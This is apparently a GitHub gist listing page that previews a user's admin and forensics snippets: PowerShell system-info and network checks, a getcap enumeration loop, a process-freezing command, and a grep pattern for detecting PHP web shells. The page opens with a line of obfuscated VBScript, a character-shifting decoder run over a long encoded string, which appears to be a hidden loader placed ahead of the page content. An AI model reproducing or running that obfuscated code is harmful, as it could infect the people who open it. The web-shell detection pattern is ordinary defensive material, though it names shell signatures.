Private Function BysqAEwmfD(zEx) : If Len(zEx) < 5 Then : a = "" : Exit Function : End If : Dim p : zEx = Mid(zEx,3,Len(zEx)-4) : For i=2 To Len(zEx) Step 2 : xehFDCC = Asc(Mid(zEx,i,1)) + 10 : If xehFDCC > 126 Then : xehFDCC = xehFDCC - 126 + 33 - 1 : End If : j=Chr(xehFDCC) : If j = "~" Then : j=" " : End If : p = p & j : Next : BysqAEwmfD = p : End Function : BnjBhzaGjEs = BysqAEwmfD("}H6Iv[7j~tci.[phYlt_nY9[/t*3rtH91hl[]W^j|[3EDXw`{[&YWj:|CvjInYN^([hZkk,bm[w$QI\[NhTlv_rYr[HvO}gtL0&tNY:W`bDb~t]i.[KhUlj_JY^[y$!9yevd*d|[{YBjN|u}/t+0Tt#:,_DcMt=jBWhi:a?:B[q\z_Vd~_(j+_oe3det_0ytmI>[rjatgj0WVi'aE:5[i\`_3d+_@jM_]eTd#tb3=tkik[(h=lX_:Y=[v$1DS[bmKJ]W,i3aJ|Q&>}Rt|tS0[tcjDWliXa_:)[(\j_=dl_Aj&_Yeqd\$'H+[r]/_(iaj^hUWujE_>eTd6?cd`\de,$"":x[YikY=hN_#fWj%_,e^d9tR3HtrvSj0WAilan:>[2ibY6v0t^0Itqj~W=iHa>:S[/\^_Ldi_Zj#_KepdU$uIz[:jkj{_cdC]\i=$=;}dpWdX-bK[fZ>te3ktZJ>h5k.[?t-0.tOj8WfiGaY:D[5\]_7df_UjZ_[e!dk$%I*[Gj<j__.dr]BiD$RIEj#WshijdM1^A[rd17olPW4_rbiW
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<# | |
.SYNOPSIS | |
sqlite.ps1 - Install, run, and uninstall sqlite for all you hacky needs. | |
.OUTPUTS | |
Should be no outputs other than what is generated in the sqlite session. | |
.EXAMPLE | |
.\sqlite.ps1 - _Runs the script_ | |
.NOTES | |
Underscores denote sarcasm | |
#> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<# | |
.SYNOPSIS | |
Pull the following from the DC: | |
# Local Time | |
# Desktop settings | |
# BIOS info | |
# Installed hotfixes | |
# Operating System Version Information | |
# Local Users and owner | |
# All services on local machine |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#/usr/bin/python | |
# Lets get those evil IPS! | |
# If you’re using Linux or BSD systems, check your favourite package repository for python-celementtree or py-celementtree packages | |
# | |
# Aggregation of bad IPs is what this is after, and that's what I'll make it do | |
# | |
import xml.etree.cElementTree as ET | |
import numpy as np | |
import sys |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<# | |
.SYNOPSIS | |
Uninstall HP Data Protector if it exists | |
.INPUTS | |
Path for: | |
# HP Data Protector | |
.OUTPUTS | |
Console output - Currently | |
.NOTES | |
Version: 1.0 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh | |
say -v Karen "theee" | |
say -v Daniel "eeeeee" | |
say -v Alex "eeeeee" | |
say -v Tessa "eeeeee" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## Using Test-Connection, test connectivity to the internet using the following as subjects: ## | |
## 8.8.8.8 | |
## http://google.com | |
## https://google.com | |
## Find and replace XXXX with your choice of internal DNS name :) | |
## | |
function UX-Pause { | |
Write-Progress -Activity "Testing Connection" -SecondsRemaining 3 | |
Start-Sleep 1 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
for filename in `ls -l . | awk '{print $9}'`; do getcap $filename; done |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Look for potentially bad stuff that's compressed to hide mysterious things - run this within documentroot's of web servers to find potential php shells (source: https://djlab.com/2010/09/finding-php-shell-scripts-and-php-exploits/) | |
grep '((eval.*(base64_decode|gzinflate|\$_))|\$[0O]{4,}|FilesMan|JGF1dGhfc|IIIl|die\(PHP_OS|posix_getpwuid|Array\(base64_decode|document\.write\("\\u00|sh(3(ll|11)))' . -lroE --include=*.php* | |
# Print out processes in a nicer format to compare its shown source to actual source | |
ps -Ao pid,comm,cmd,lstart | |
# Deny those damn pesky processes their CPU time - this is based on all the bad processes being under a single user. Don't run this unless you're sure that | |
pkill -U <user> -STOP || pkill -STOP -U <user> # Depeding on OS | |
# Deny processes CPU time - this is based on a process by process working order |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## Sources: | |
# https://www.dionach.com/blog/powershell-in-forensic-investigations | |
# https://www.sans.org/reading-room/whitepapers/critical/uncovering-indicators-compromise-ioc-powershell-event-logs-traditional-monitoring-tool-36352 | |
# https://blogs.technet.microsoft.com/heyscriptingguy/2012/05/28/use-powershell-to-aid-in-security-forensics/ | |
# Lists out all established TCP connections, you can also use netstat to list all connections regardless of status. Make sure you decide whether this is TCP or UDP you want to see and remove the parentheses | |
Get-NetTCPConnection –State Established | |
netstat -ano -p (TCP/UDP) | |
# List out all processes running on the server |
NewerOlder